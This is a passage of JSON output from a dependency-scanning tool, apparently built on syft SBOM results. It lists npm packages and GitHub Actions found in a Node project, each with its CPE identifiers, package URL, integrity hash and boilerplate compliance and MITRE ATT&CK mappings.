"Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f2b699c115f128e7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "startLine": 0 }, "message": "Package discovered: actions/setup-node v2", "title": "actions/setup-node v2", "description": "Package discovered: actions/setup-node v2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "94c6b30301562d90", "name": "actions/setup-node", "version": "v2", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "accessPath": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/setup-node@v2", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/setup-node@v2" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c207c7fc955b5ded", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/stream-shift/.github/workflows/test.yml", "startLine": 0 }, "message": "Package discovered: actions/setup-node v3", "title": "actions/setup-node v3", "description": "Package discovered: actions/setup-node v3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c1170e00c0039987", "name": "actions/setup-node", "version": "v3", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/stream-shift/.github/workflows/test.yml", "accessPath": "/node_modules/stream-shift/.github/workflows/test.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/setup-node@v3", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/setup-node@v3" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "751a614666804651", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/reusify/.github/workflows/ci.yml", "startLine": 0 }, "message": "Package discovered: actions/setup-node v4", "title": "actions/setup-node v4", "description": "Package discovered: actions/setup-node v4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "de6527b74c32bd7a", "name": "actions/setup-node", "version": "v4", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/reusify/.github/workflows/ci.yml", "accessPath": "/node_modules/reusify/.github/workflows/ci.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/actions/setup-node@v4", "metadataType": "github-actions-use-statement", "metadata": { "value": "actions/setup-node@v4" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "87ee223622bbf049", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: agent-base 6.0.2", "title": "agent-base 6.0.2", "description": "Package discovered: agent-base 6.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "12d1ed2dd95a1a7c", "name": "agent-base", "version": "6.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:agent-base:agent-base:6.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent-base:agent_base:6.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent_base:agent-base:6.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent_base:agent_base:6.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent:agent-base:6.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent:agent_base:6.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/agent-base@6.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", "dependencies": { "debug": "4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3360c58589af5938", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: agent-base 7.1.4", "title": "agent-base 7.1.4", "description": "Package discovered: agent-base 7.1.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f7259be6132b188d", "name": "agent-base", "version": "7.1.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:agent-base:agent-base:7.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent-base:agent_base:7.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent_base:agent-base:7.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent_base:agent_base:7.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent:agent-base:7.1.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:agent:agent_base:7.1.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/agent-base@7.1.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "83a9e4994a4bae21", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ansi-regex 5.0.1", "title": "ansi-regex 5.0.1", "description": "Package discovered: ansi-regex 5.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "434b3315d409487e", "name": "ansi-regex", "version": "5.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ansi-regex_project:ansi-regex:5.0.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/ansi-regex@5.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "55dee429ce8d0ebc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ansi-regex 6.2.2", "title": "ansi-regex 6.2.2", "description": "Package discovered: ansi-regex 6.2.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "351fe1b55f0afa57", "name": "ansi-regex", "version": "6.2.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ansi-regex_project:ansi-regex:6.2.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/ansi-regex@6.2.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.2.2.tgz", "integrity": "sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "78d002033ed5f3df", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ansi-styles 4.3.0", "title": "ansi-styles 4.3.0", "description": "Package discovered: ansi-styles 4.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d7348151a8592cc2", "name": "ansi-styles", "version": "4.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ansi-styles:ansi-styles:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi-styles:ansi_styles:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi_styles:ansi-styles:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi_styles:ansi_styles:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi:ansi-styles:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi:ansi_styles:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/ansi-styles@4.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dependencies": { "color-convert": "^2.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5a3dc64757afbf1c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ansi-styles 6.2.3", "title": "ansi-styles 6.2.3", "description": "Package discovered: ansi-styles 6.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b7d3f8e2ee8c8206", "name": "ansi-styles", "version": "6.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ansi-styles:ansi-styles:6.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi-styles:ansi_styles:6.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi_styles:ansi-styles:6.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi_styles:ansi_styles:6.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi:ansi-styles:6.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ansi:ansi_styles:6.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/ansi-styles@6.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.3.tgz", "integrity": "sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a0800e7f7f0173c9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: any-promise 1.3.0", "title": "any-promise 1.3.0", "description": "Package discovered: any-promise 1.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dc69ebae19192ee6", "name": "any-promise", "version": "1.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } 